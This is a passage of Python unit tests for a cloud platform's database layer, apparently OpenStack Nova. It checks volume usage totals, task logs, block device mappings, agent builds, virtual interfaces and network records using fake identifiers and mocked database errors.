vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
self.assertEqual(len(vol_usages), 0)
db.vol_usage_update(ctxt, u'1',
rd_req=10000, rd_bytes=20000,
wr_req=30000, wr_bytes=40000,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1')
# Instance rebooted or crashed. block device stats were reset and are
# less than the previous values
db.vol_usage_update(ctxt, u'1',
rd_req=100, rd_bytes=200,
wr_req=300, wr_bytes=400,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1')
db.vol_usage_update(ctxt, u'1',
rd_req=200, rd_bytes=300,
wr_req=400, wr_bytes=500,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1')
vol_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
expected_vol_usage = {'volume_id': u'1',
'instance_uuid': 'fake-instance-uuid1',
'project_id': 'fake-project-uuid1',
'availability_zone': 'fake-az',
'user_id': 'fake-user-uuid1',
'curr_reads': 200,
'curr_read_bytes': 300,
'curr_writes': 400,
'curr_write_bytes': 500,
'tot_reads': 10000,
'tot_read_bytes': 20000,
'tot_writes': 30000,
'tot_write_bytes': 40000}
for key, value in expected_vol_usage.items():
self.assertEqual(vol_usage[key], value, key)
def test_vol_usage_update_totals_update_when_blockdevicestats_reset(self):
# This is unlikely to happen, but could when a volume is detached
# right after a instance has rebooted / recovered and before
# the system polled and updated the volume usage cache table.
ctxt = context.get_admin_context()
now = timeutils.utcnow()
start_time = now - datetime.timedelta(seconds=10)
vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
self.assertEqual(len(vol_usages), 0)
db.vol_usage_update(ctxt, u'1',
rd_req=10000, rd_bytes=20000,
wr_req=30000, wr_bytes=40000,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1')
# Instance rebooted or crashed. block device stats were reset and are
# less than the previous values
db.vol_usage_update(ctxt, u'1',
rd_req=100, rd_bytes=200,
wr_req=300, wr_bytes=400,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1',
update_totals=True)
vol_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
expected_vol_usage = {'volume_id': u'1',
'instance_uuid': 'fake-instance-uuid1',
'project_id': 'fake-project-uuid1',
'availability_zone': 'fake-az',
'user_id': 'fake-user-uuid1',
'curr_reads': 0,
'curr_read_bytes': 0,
'curr_writes': 0,
'curr_write_bytes': 0,
'tot_reads': 10100,
'tot_read_bytes': 20200,
'tot_writes': 30300,
'tot_write_bytes': 40400}
for key, value in expected_vol_usage.items():
self.assertEqual(vol_usage[key], value, key)
class TaskLogTestCase(test.TestCase):
def setUp(self):
super(TaskLogTestCase, self).setUp()
self.context = context.get_admin_context()
now = timeutils.utcnow()
self.begin = timeutils.strtime(now - datetime.timedelta(seconds=10))
self.end = timeutils.strtime(now - datetime.timedelta(seconds=5))
self.task_name = 'fake-task-name'
self.host = 'fake-host'
self.message = 'Fake task message'
db.task_log_begin_task(self.context, self.task_name, self.begin,
self.end, self.host, message=self.message)
def test_task_log_get(self):
result = db.task_log_get(self.context, self.task_name, self.begin,
self.end, self.host)
self.assertEqual(result['task_name'], self.task_name)
self.assertEqual(result['period_beginning'],
timeutils.parse_strtime(self.begin))
self.assertEqual(result['period_ending'],
timeutils.parse_strtime(self.end))
self.assertEqual(result['host'], self.host)
self.assertEqual(result['message'], self.message)
def test_task_log_get_all(self):
result = db.task_log_get_all(self.context, self.task_name, self.begin,
self.end, host=self.host)
self.assertEqual(len(result), 1)
result = db.task_log_get_all(self.context, self.task_name, self.begin,
self.end, host=self.host, state='')
self.assertEqual(len(result), 0)
def test_task_log_begin_task(self):
db.task_log_begin_task(self.context, 'fake', self.begin,
self.end, self.host, task_items=42,
message=self.message)
result = db.task_log_get(self.context, 'fake', self.begin,
self.end, self.host)
self.assertEqual(result['task_name'], 'fake')
def test_task_log_begin_task_duplicate(self):
params = (self.context, 'fake', self.begin, self.end, self.host)
db.task_log_begin_task(*params, message=self.message)
self.assertRaises(exception.TaskAlreadyRunning,
db.task_log_begin_task,
*params, message=self.message)
def test_task_log_end_task(self):
errors = 1
db.task_log_end_task(self.context, self.task_name, self.begin,
self.end, self.host, errors, message=self.message)
result = db.task_log_get(self.context, self.task_name, self.begin,
self.end, self.host)
self.assertEqual(result['errors'], 1)
def test_task_log_end_task_task_not_running(self):
self.assertRaises(exception.TaskNotRunning,
db.task_log_end_task, self.context, 'nonexistent',
self.begin, self.end, self.host, 42,
message=self.message)
class BlockDeviceMappingTestCase(test.TestCase):
def setUp(self):
super(BlockDeviceMappingTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.instance = db.instance_create(self.ctxt, {})
def _create_bdm(self, values):
values.setdefault('instance_uuid', self.instance['uuid'])
values.setdefault('device_name', 'fake_device')
values.setdefault('source_type', 'volume')
values.setdefault('destination_type', 'volume')
block_dev = block_device.BlockDeviceDict(values)
db.block_device_mapping_create(self.ctxt, block_dev, legacy=False)
uuid = block_dev['instance_uuid']
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
for bdm in bdms:
if bdm['device_name'] == values['device_name']:
return bdm
def test_scrub_empty_str_values_no_effect(self):
values = {'volume_size': 5}
expected = copy.copy(values)
sqlalchemy_api._scrub_empty_str_values(values, ['volume_size'])
self.assertEqual(values, expected)
def test_scrub_empty_str_values_empty_string(self):
values = {'volume_size': ''}
sqlalchemy_api._scrub_empty_str_values(values, ['volume_size'])
self.assertEqual(values, {})
def test_scrub_empty_str_values_empty_unicode(self):
values = {'volume_size': u''}
sqlalchemy_api._scrub_empty_str_values(values, ['volume_size'])
self.assertEqual(values, {})
def test_block_device_mapping_create(self):
bdm = self._create_bdm({})
self.assertIsNotNone(bdm)
def test_block_device_mapping_update(self):
bdm = self._create_bdm({})
result = db.block_device_mapping_update(
self.ctxt, bdm['id'], {'destination_type': 'moon'},
legacy=False)
uuid = bdm['instance_uuid']
bdm_real = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(bdm_real[0]['destination_type'], 'moon')
# Also make sure the update call returned correct data
self.assertEqual(dict(bdm_real[0]),
dict(result))
def test_block_device_mapping_update_or_create(self):
values = {
'instance_uuid': self.instance['uuid'],
'device_name': 'fake_name',
'source_type': 'volume',
'destination_type': 'volume'
}
# check create
db.block_device_mapping_update_or_create(self.ctxt, values,
legacy=False)
uuid = values['instance_uuid']
bdm_real = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdm_real), 1)
self.assertEqual(bdm_real[0]['device_name'], 'fake_name')
# check update
values['destination_type'] = 'camelot'
db.block_device_mapping_update_or_create(self.ctxt, values,
legacy=False)
bdm_real = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdm_real), 1)
bdm_real = bdm_real[0]
self.assertEqual(bdm_real['device_name'], 'fake_name')
self.assertEqual(bdm_real['destination_type'], 'camelot')
# check create without device_name
bdm1 = dict(values)
bdm1['device_name'] = None
db.block_device_mapping_update_or_create(self.ctxt, bdm1, legacy=False)
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
with_device_name = [b for b in bdms if b['device_name'] is not None]
without_device_name = [b for b in bdms if b['device_name'] is None]
self.assertEqual(len(with_device_name), 1,
'expected 1 bdm with device_name, found %d' %
len(with_device_name))
self.assertEqual(len(without_device_name), 1,
'expected 1 bdm without device_name, found %d' %
len(without_device_name))
# check create multiple devices without device_name
bdm2 = dict(values)
bdm2['device_name'] = None
db.block_device_mapping_update_or_create(self.ctxt, bdm2, legacy=False)
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
with_device_name = [b for b in bdms if b['device_name'] is not None]
without_device_name = [b for b in bdms if b['device_name'] is None]
self.assertEqual(len(with_device_name), 1,
'expected 1 bdm with device_name, found %d' %
len(with_device_name))
self.assertEqual(len(without_device_name), 2,
'expected 2 bdms without device_name, found %d' %
len(without_device_name))
def test_block_device_mapping_update_or_create_multiple_ephemeral(self):
uuid = self.instance['uuid']
values = {
'instance_uuid': uuid,
'source_type': 'blank',
'guest_format': 'myformat',
}
bdm1 = dict(values)
bdm1['device_name'] = '/dev/sdb'
db.block_device_mapping_update_or_create(self.ctxt, bdm1, legacy=False)
bdm2 = dict(values)
bdm2['device_name'] = '/dev/sdc'
db.block_device_mapping_update_or_create(self.ctxt, bdm2, legacy=False)
bdm_real = sorted(
db.block_device_mapping_get_all_by_instance(self.ctxt, uuid),
key=lambda bdm: bdm['device_name']
)
self.assertEqual(len(bdm_real), 2)
for bdm, device_name in zip(bdm_real, ['/dev/sdb', '/dev/sdc']):
self.assertEqual(bdm['device_name'], device_name)
self.assertEqual(bdm['guest_format'], 'myformat')
def test_block_device_mapping_update_or_create_check_remove_virt(self):
uuid = self.instance['uuid']
values = {
'instance_uuid': uuid,
'source_type': 'blank',
'destination_type': 'local',
'guest_format': 'swap',
}
# check that old swap bdms are deleted on create
val1 = dict(values)
val1['device_name'] = 'device1'
db.block_device_mapping_create(self.ctxt, val1, legacy=False)
val2 = dict(values)
val2['device_name'] = 'device2'
db.block_device_mapping_update_or_create(self.ctxt, val2, legacy=False)
bdm_real = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdm_real), 1)
bdm_real = bdm_real[0]
self.assertEqual(bdm_real['device_name'], 'device2')
self.assertEqual(bdm_real['source_type'], 'blank')
self.assertEqual(bdm_real['guest_format'], 'swap')
db.block_device_mapping_destroy(self.ctxt, bdm_real['id'])
def test_block_device_mapping_get_all_by_instance(self):
uuid1 = self.instance['uuid']
uuid2 = db.instance_create(self.ctxt, {})['uuid']
bmds_values = [{'instance_uuid': uuid1,
'device_name': '/dev/vda'},
{'instance_uuid': uuid2,
'device_name': '/dev/vdb'},
{'instance_uuid': uuid2,
'device_name': '/dev/vdc'}]
for bdm in bmds_values:
self._create_bdm(bdm)
bmd = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid1)
self.assertEqual(len(bmd), 1)
self.assertEqual(bmd[0]['device_name'], '/dev/vda')
bmd = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid2)
self.assertEqual(len(bmd), 2)
def test_block_device_mapping_destroy(self):
bdm = self._create_bdm({})
db.block_device_mapping_destroy(self.ctxt, bdm['id'])
bdm = db.block_device_mapping_get_all_by_instance(self.ctxt,
bdm['instance_uuid'])
self.assertEqual(len(bdm), 0)
def test_block_device_mapping_destroy_by_instance_and_volume(self):
vol_id1 = '69f5c254-1a5b-4fff-acf7-cb369904f58f'
vol_id2 = '69f5c254-1a5b-4fff-acf7-cb369904f59f'
self._create_bdm({'device_name': '/dev/vda', 'volume_id': vol_id1})
self._create_bdm({'device_name': '/dev/vdb', 'volume_id': vol_id2})
uuid = self.instance['uuid']
db.block_device_mapping_destroy_by_instance_and_volume(self.ctxt, uuid,
vol_id1)
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdms), 1)
self.assertEqual(bdms[0]['device_name'], '/dev/vdb')
def test_block_device_mapping_destroy_by_instance_and_device(self):
self._create_bdm({'device_name': '/dev/vda'})
self._create_bdm({'device_name': '/dev/vdb'})
uuid = self.instance['uuid']
params = (self.ctxt, uuid, '/dev/vdb')
db.block_device_mapping_destroy_by_instance_and_device(*params)
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdms), 1)
self.assertEqual(bdms[0]['device_name'], '/dev/vda')
def test_block_device_mapping_get_by_volume_id(self):
self._create_bdm({'volume_id': 'fake_id'})
bdm = db.block_device_mapping_get_by_volume_id(self.ctxt, 'fake_id')
self.assertEqual(bdm['volume_id'], 'fake_id')
def test_block_device_mapping_get_by_volume_id_join_instance(self):
self._create_bdm({'volume_id': 'fake_id'})
bdm = db.block_device_mapping_get_by_volume_id(self.ctxt, 'fake_id',
['instance'])
self.assertEqual(bdm['volume_id'], 'fake_id')
self.assertEqual(bdm['instance']['uuid'], self.instance['uuid'])
class AgentBuildTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.agent_build_* methods."""
def setUp(self):
super(AgentBuildTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def test_agent_build_create_and_get_all(self):
self.assertEqual(0, len(db.agent_build_get_all(self.ctxt)))
agent_build = db.agent_build_create(self.ctxt, {'os': 'GNU/HURD'})
all_agent_builds = db.agent_build_get_all(self.ctxt)
self.assertEqual(1, len(all_agent_builds))
self._assertEqualObjects(agent_build, all_agent_builds[0])
def test_agent_build_get_by_triple(self):
agent_build = db.agent_build_create(self.ctxt, {'hypervisor': 'kvm',
'os': 'FreeBSD', 'architecture': arch.X86_64})
self.assertIsNone(db.agent_build_get_by_triple(self.ctxt, 'kvm',
'FreeBSD', 'i386'))
self._assertEqualObjects(agent_build, db.agent_build_get_by_triple(
self.ctxt, 'kvm', 'FreeBSD', arch.X86_64))
def test_agent_build_destroy(self):
agent_build = db.agent_build_create(self.ctxt, {})
self.assertEqual(1, len(db.agent_build_get_all(self.ctxt)))
db.agent_build_destroy(self.ctxt, agent_build.id)
self.assertEqual(0, len(db.agent_build_get_all(self.ctxt)))
def test_agent_build_update(self):
agent_build = db.agent_build_create(self.ctxt, {'os': 'HaikuOS'})
db.agent_build_update(self.ctxt, agent_build.id, {'os': 'ReactOS'})
self.assertEqual('ReactOS', db.agent_build_get_all(self.ctxt)[0].os)
def test_agent_build_destroy_destroyed(self):
agent_build = db.agent_build_create(self.ctxt, {})
db.agent_build_destroy(self.ctxt, agent_build.id)
self.assertRaises(exception.AgentBuildNotFound,
db.agent_build_destroy, self.ctxt, agent_build.id)
def test_agent_build_update_destroyed(self):
agent_build = db.agent_build_create(self.ctxt, {'os': 'HaikuOS'})
db.agent_build_destroy(self.ctxt, agent_build.id)
self.assertRaises(exception.AgentBuildNotFound,
db.agent_build_update, self.ctxt, agent_build.id, {'os': 'OS/2'})
def test_agent_build_exists(self):
values = {'hypervisor': 'kvm', 'os': 'FreeBSD',
'architecture': arch.X86_64}
db.agent_build_create(self.ctxt, values)
self.assertRaises(exception.AgentBuildExists, db.agent_build_create,
self.ctxt, values)
def test_agent_build_get_all_by_hypervisor(self):
values = {'hypervisor': 'kvm', 'os': 'FreeBSD',
'architecture': arch.X86_64}
created = db.agent_build_create(self.ctxt, values)
actual = db.agent_build_get_all(self.ctxt, hypervisor='kvm')
self._assertEqualListsOfObjects([created], actual)
class VirtualInterfaceTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(VirtualInterfaceTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.instance_uuid = db.instance_create(self.ctxt, {})['uuid']
values = {'host': 'localhost', 'project_id': 'project1'}
self.network = db.network_create_safe(self.ctxt, values)
def _get_base_values(self):
return {
'instance_uuid': self.instance_uuid,
'address': 'fake_address',
'network_id': self.network['id'],
'uuid': str(stdlib_uuid.uuid4())
}
def mock_db_query_first_to_raise_data_error_exception(self):
self.mox.StubOutWithMock(query.Query, 'first')
query.Query.first().AndRaise(db_exc.DBError())
self.mox.ReplayAll()
def _create_virt_interface(self, values):
v = self._get_base_values()
v.update(values)
return db.virtual_interface_create(self.ctxt, v)
def test_virtual_interface_create(self):
vif = self._create_virt_interface({})
self.assertIsNotNone(vif['id'])
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at', 'uuid']
self._assertEqualObjects(vif, self._get_base_values(), ignored_keys)
def test_virtual_interface_create_with_duplicate_address(self):
vif = self._create_virt_interface({})
self.assertRaises(exception.VirtualInterfaceCreateException,
self._create_virt_interface, {"uuid": vif['uuid']})
def test_virtual_interface_get(self):
vifs = [self._create_virt_interface({'address': 'a'}),
self._create_virt_interface({'address': 'b'})]
for vif in vifs:
real_vif = db.virtual_interface_get(self.ctxt, vif['id'])
self._assertEqualObjects(vif, real_vif)
def test_virtual_interface_get_by_address(self):
vifs = [self._create_virt_interface({'address': 'first'}),
self._create_virt_interface({'address': 'second'})]
for vif in vifs:
real_vif = db.virtual_interface_get_by_address(self.ctxt,
vif['address'])
self._assertEqualObjects(vif, real_vif)
def test_virtual_interface_get_by_address_not_found(self):
self.assertIsNone(db.virtual_interface_get_by_address(self.ctxt,
"i.nv.ali.ip"))
def test_virtual_interface_get_by_address_data_error_exception(self):
self.mock_db_query_first_to_raise_data_error_exception()
self.assertRaises(exception.InvalidIpAddressError,
db.virtual_interface_get_by_address,
self.ctxt,
"i.nv.ali.ip")
def test_virtual_interface_get_by_uuid(self):
vifs = [self._create_virt_interface({"address": "address_1"}),
self._create_virt_interface({"address": "address_2"})]
for vif in vifs:
real_vif = db.virtual_interface_get_by_uuid(self.ctxt, vif['uuid'])
self._assertEqualObjects(vif, real_vif)
def test_virtual_interface_get_by_instance(self):
inst_uuid2 = db.instance_create(self.ctxt, {})['uuid']
vifs1 = [self._create_virt_interface({'address': 'fake1'}),
self._create_virt_interface({'address': 'fake2'})]
# multiple nic of same instance
vifs2 = [self._create_virt_interface({'address': 'fake3',
'instance_uuid': inst_uuid2}),
self._create_virt_interface({'address': 'fake4',
'instance_uuid': inst_uuid2})]
vifs1_real = db.virtual_interface_get_by_instance(self.ctxt,
self.instance_uuid)
vifs2_real = db.virtual_interface_get_by_instance(self.ctxt,
inst_uuid2)
self._assertEqualListsOfObjects(vifs1, vifs1_real)
self._assertEqualOrderedListOfObjects(vifs2, vifs2_real)
def test_virtual_interface_get_by_instance_and_network(self):
inst_uuid2 = db.instance_create(self.ctxt, {})['uuid']
values = {'host': 'localhost', 'project_id': 'project2'}
network_id = db.network_create_safe(self.ctxt, values)['id']
vifs = [self._create_virt_interface({'address': 'fake1'}),
self._create_virt_interface({'address': 'fake2',
'network_id': network_id,
'instance_uuid': inst_uuid2}),
self._create_virt_interface({'address': 'fake3',
'instance_uuid': inst_uuid2})]
for vif in vifs:
params = (self.ctxt, vif['instance_uuid'], vif['network_id'])
r_vif = db.virtual_interface_get_by_instance_and_network(*params)
self._assertEqualObjects(r_vif, vif)
def test_virtual_interface_delete_by_instance(self):
inst_uuid2 = db.instance_create(self.ctxt, {})['uuid']
values = [dict(address='fake1'), dict(address='fake2'),
dict(address='fake3', instance_uuid=inst_uuid2)]
for vals in values:
self._create_virt_interface(vals)
db.virtual_interface_delete_by_instance(self.ctxt, self.instance_uuid)
real_vifs1 = db.virtual_interface_get_by_instance(self.ctxt,
self.instance_uuid)
real_vifs2 = db.virtual_interface_get_by_instance(self.ctxt,
inst_uuid2)
self.assertEqual(len(real_vifs1), 0)
self.assertEqual(len(real_vifs2), 1)
def test_virtual_interface_get_all(self):
inst_uuid2 = db.instance_create(self.ctxt, {})['uuid']
values = [dict(address='fake1'), dict(address='fake2'),
dict(address='fake3', instance_uuid=inst_uuid2)]
vifs = [self._create_virt_interface(val) for val in values]
real_vifs = db.virtual_interface_get_all(self.ctxt)
self._assertEqualListsOfObjects(vifs, real_vifs)
class NetworkTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.network_* methods."""
def setUp(self):
super(NetworkTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_associated_fixed_ip(self, host, cidr, ip):
network = db.network_create_safe(self.ctxt,
{'project_id': 'project1', 'cidr': cidr})
self.assertFalse(db.network_in_use_on_host(self.ctxt, network.id,
host))
instance = db.instance_create(self.ctxt,
{'project_id': 'project1', 'host': host})
virtual_interface = db.virtual_interface_create(self.ctxt,
{'instance_uuid': instance.uuid, 'network_id': network.id,
'address': ip})
db.fixed_ip_create(self.ctxt, {'address': ip,
'network_id': network.id, 'allocated': True,
'virtual_interface_id': virtual_interface.id})
db.fixed_ip_associate(self.ctxt, ip, instance.uuid,
network.id)
return network, instance
def test_network_get_associated_default_route(self):
network, instance = self._get_associated_fixed_ip('host.net',
'192.0.2.0/30', '192.0.2.1')
network2 = db.network_create_safe(self.ctxt,
{'project_id': 'project1', 'cidr': '192.0.3.0/30'})
ip = '192.0.3.1'
virtual_interface = db.virtual_interface_create(self.ctxt,
{'instance_uuid': instance.uuid, 'network_id': network2.id,
'address': ip})
db.fixed_ip_create(self.ctxt, {'address': ip,
'network_id': network2.id, 'allocated': True,
'virtual_interface_id': virtual_interface.id})
db.fixed_ip_associate(self.ctxt, ip, instance.uuid,
network2.id)
data = db.network_get_associated_fixed_ips(self.ctxt, network.id)
self.assertEqual(1, len(data))
self.assertTrue(data[0]['default_route'])
data = db.network_get_associated_fixed_ips(self.ctxt, network2.id)
self.assertEqual(1, len(data))
self.assertFalse(data[0]['default_route'])
def test_network_get_associated_fixed_ips(self):
network, instance = self._get_associated_fixed_ip('host.net',
'192.0.2.0/30', '192.0.2.1')
data = db.network_get_associated_fixed_ips(self.ctxt, network.id)
self.assertEqual(1, len(data))
self.assertEqual('192.0.2.1', data[0]['address'])
self.assertEqual('192.0.2.1', data[0]['vif_address'])
self.assertEqual(instance.uuid, data[0]['instance_uuid'])
self.assertTrue(data[0]['allocated'])
def test_network_create_safe(self):
values = {'host': 'localhost', 'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
self.assertEqual(36, len(network['uuid']))
db_network = db.network_get(self.ctxt, network['id'])
self._assertEqualObjects(network, db_network)
def test_network_create_with_duplicate_vlan(self):
values1 = {'host': 'localhost', 'project_id': 'project1', 'vlan': 1}
values2 = {'host': 'something', 'project_id': 'project1', 'vlan': 1}
db.network_create_safe(self.ctxt, values1)
self.assertRaises(exception.DuplicateVlan,
db.network_create_safe, self.ctxt, values2)
def test_network_delete_safe(self):
values = {'host': 'localhost', 'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
db.network_get(self.ctxt, network['id'])
values = {'network_id': network['id'], 'address': '192.168.1.5'}
address1 = db.fixed_ip_create(self.ctxt, values)['address']
values = {'network_id': network['id'],
'address': '192.168.1.6',
'allocated': True}
address2 = db.fixed_ip_create(self.ctxt, values)['address']
self.assertRaises(exception.NetworkInUse,
db.network_delete_safe, self.ctxt, network['id'])
db.fixed_ip_update(self.ctxt, address2, {'allocated': False})
network = db.network_delete_safe(self.ctxt, network['id'])
self.assertRaises(exception.FixedIpNotFoundForAddress,
db.fixed_ip_get_by_address, self.ctxt, address1)
ctxt = self.ctxt.elevated(read_deleted='yes')
fixed_ip = db.fixed_ip_get_by_address(ctxt, address1)
self.assertTrue(fixed_ip['deleted'])
def test_network_in_use_on_host(self):
values = {'host': 'foo', 'hostname': 'myname'}
instance = db.instance_create(self.ctxt, values)
values = {'address': '192.168.1.5', 'instance_uuid': instance['uuid']}
vif = db.virtual_interface_create(self.ctxt, values)
values = {'address': '192.168.1.6',
'network_id': 1,
'allocated': True,
'instance_uuid': instance['uuid'],
'virtual_interface_id': vif['id']}
db.fixed_ip_create(self.ctxt, values)
self.assertEqual(db.network_in_use_on_host(self.ctxt, 1, 'foo'), True)
self.assertEqual(db.network_in_use_on_host(self.ctxt, 1, 'bar'), False)
def test_network_update_nonexistent(self):
self.assertRaises(exception.NetworkNotFound,
db.network_update, self.ctxt, 123456, {})
def test_network_update_with_duplicate_vlan(self):
values1 = {'host': 'localhost', 'project_id': 'project1', 'vlan': 1}
values2 = {'host': 'something', 'project_id': 'project1', 'vlan': 2}
network_ref = db.network_create_safe(self.ctxt, values1)
db.network_create_safe(self.ctxt, values2)
self.assertRaises(exception.DuplicateVlan,
db.network_update, self.ctxt,
network_ref["id"], values2)
def test_network_update(self):
network = db.network_create_safe(self.ctxt, {'project_id': 'project1',
'vlan': 1, 'host': 'test.com'})
db.network_update(self.ctxt, network.id, {'vlan': 2})
network_new = db.network_get(self.ctxt, network.id)
self.assertEqual(2, network_new.vlan)
def test_network_set_host_nonexistent_network(self):
self.assertRaises(exception.NetworkNotFound, db.network_set_host,
self.ctxt, 123456, 'nonexistent')
def test_network_set_host_already_set_correct(self):
values = {'host': 'example.com', 'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
self.assertIsNone(db.network_set_host(self.ctxt, network.id,
'example.com'))
def test_network_set_host_already_set_incorrect(self):
values = {'host': 'example.com', 'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
self.assertIsNone(db.network_set_host(self.ctxt, network.id,
'new.example.com'))
def test_network_set_host_with_initially_no_host(self):
values = {'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
db.network_set_host(self.ctxt, network.id, 'example.com')
self.assertEqual('example.com',
db.network_get(self.ctxt, network.id).host)
def test_network_set_host_succeeds_retry_on_deadlock(self):
values = {'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
def fake_update(params):
if mock_update.call_count == 1:
raise db_exc.DBDeadlock()
else:
return 1
with mock.patch('sqlalchemy.orm.query.Query.update',
side_effect=fake_update) as mock_update:
db.network_set_host(self.ctxt, network.id, 'example.com')
self.assertEqual(2, mock_update.call_count)
def test_network_set_host_succeeds_retry_on_no_rows_updated(self):
values = {'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
def fake_update(params):
if mock_update.call_count == 1:
return 0
else:
return 1
with mock.patch('sqlalchemy.orm.query.Query.update',
side_effect=fake_update) as mock_update:
db.network_set_host(self.ctxt, network.id, 'example.com')
self.assertEqual(2, mock_update.call_count)
def test_network_set_host_failed_with_retry_on_no_rows_updated(self):
values = {'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
with mock.patch('sqlalchemy.orm.query.Query.update',
return_value=0) as mock_update:
self.assertRaises(exception.NetworkSetHostFailed,
db.network_set_host, self.ctxt, network.id,
'example.com')
# 5 retries + initial attempt
self.assertEqual(6, mock_update.call_count)
def test_network_get_all_by_host(self):
self.assertEqual([],
db.network_get_all_by_host(self.ctxt, 'example.com'))
host = 'h1.example.com'
# network with host set
net1 = db.network_create_safe(self.ctxt, {'host': host})
self._assertEqualListsOfObjects([net1],
db.network_get_all_by_host(self.ctxt, host))
# network with fixed ip with host set
net2 = db.network_create_safe(self.ctxt, {})
db.fixed_ip_create(self.ctxt, {'host': host, 'network_id': net2.id})
db.network_get_all_by_host(self.ctxt, host)
self._assertEqualListsOfObjects([net1, net2],
db.network_get_all_by_host(self.ctxt, host))
# network with instance with host set
net3 = db.network_create_safe(self.ctxt, {})
instance = db.instance_create(self.ctxt, {'host': host})
db.fixed_ip_create(self.ctxt, {'network_id': net3.id,
'instance_uuid': instance.uuid})
self._assertEqualListsOfObjects([net1, net2, net3],
db.network_get_all_by_host(self.ctxt, host))
def test_network_get_by_cidr(self):
cidr = '192.0.2.0/30'
cidr_v6 = '2001:db8:1::/64'
network = db.network_create_safe(self.ctxt,
{'project_id': 'project1', 'cidr': cidr, 'cidr_v6': cidr_v6})
self._assertEqualObjects(network,
db.network_get_by_cidr(self.ctxt, cidr))
self._assertEqualObjects(network,
db.network_get_by_cidr(self.ctxt, cidr_v6))
def test_network_get_by_cidr_nonexistent(self):
self.assertRaises(exception.NetworkNotFoundForCidr,
db.network_get_by_cidr, self.ctxt, '192.0.2.0/30')
def test_network_get_by_uuid(self):
network = db.network_create_safe(self.ctxt,
{'project_id': 'project_1'})
self._assertEqualObjects(network,
db.network_get_by_uuid(self.ctxt, network.uuid))
def test_network_get_by_uuid_nonexistent(self):
self.assertRaises(exception.NetworkNotFoundForUUID,
db.network_get_by_uuid, self.ctxt, 'non-existent-uuid')
def test_network_get_all_by_uuids_no_networks(self):
self.assertRaises(exception.NoNetworksFound,
db.network_get_all_by_uuids, self.ctxt, ['non-existent-uuid'])
def test_network_get_all_by_uuids(self):
net1 = db.network_create_safe(self.ctxt, {})
net2 = db.network_create_safe(self.ctxt, {})
self._assertEqualListsOfObjects([net1, net2],
db.network_get_all_by_uuids(self.ctxt, [net1.uuid, net2.uuid]))
def test_network_get_all_no_networks(self):
self.assertRaises(exception.NoNetworksFound,
db.network_get_all, self.ctxt)
def test_network_get_all(self):
network = db.network_create_safe(self.ctxt, {})
network_db = db.network_get_all(self.ctxt)
self.assertEqual(1, len(network_db))
self._assertEqualObjects(network, network_db[0])
def test_network_get_all_admin_user(self):
network1 = db.network_create_safe(self.ctxt, {})
network2 = db.network_create_safe(self.ctxt,
{'project_id': 'project1'})
self._assertEqualListsOfObjects([network1, network2],
db.network_get_all(self.ctxt,
project_only=True))
def test_network_get_all_normal_user(self):
normal_ctxt = context.RequestContext('fake', 'fake')
db.network_create_safe(self.ctxt, {})
db.network_create_safe(self.ctxt, {'project_id': 'project1'})
network1 = db.network_create_safe(self.ctxt,
{'project_id': 'fake'})
network_db = db.network_get_all(normal_ctxt, project_only=True)
self.assertEqual(1, len(network_db))
self._assertEqualObjects(network1, network_db[0])
def test_network_get(self):
network = db.network_create_safe(self.ctxt, {})
self._assertEqualObjects(db.network_get(self.ctxt, network.id),
network)
db.network_delete_safe(self.ctxt, network.id)
self.assertRaises(exception.NetworkNotFound,
db.network_get, self.ctxt, network.id)
def test_network_associate(self):
network = db.network_create_safe(self.ctxt, {})
self.assertIsNone(network.project_id)
db.network_associate(self.ctxt, "project1", network.id)
self.assertEqual("project1", db.network_get(self.ctxt,
network.id).project_id)
def test_network_diassociate(self):
network = db.network_create_safe(self.ctxt,
{'project_id': 'project1', 'host': 'test.net'})
# disassociate project
db.network_disassociate(self.ctxt, network.id, False, True)
self.assertIsNone(db.network_get(self.ctxt, network.id).project_id)
# disassociate host
db.network_disassociate(self.ctxt, network.id, True, False)
self.assertIsNone(db.network_get(self.ctxt, network.id).host)
def test_network_count_reserved_ips(self):
net = db.network_create_safe(self.ctxt, {})
self.assertEqual(0, db.network_count_reserved_ips(self.ctxt, net.id))
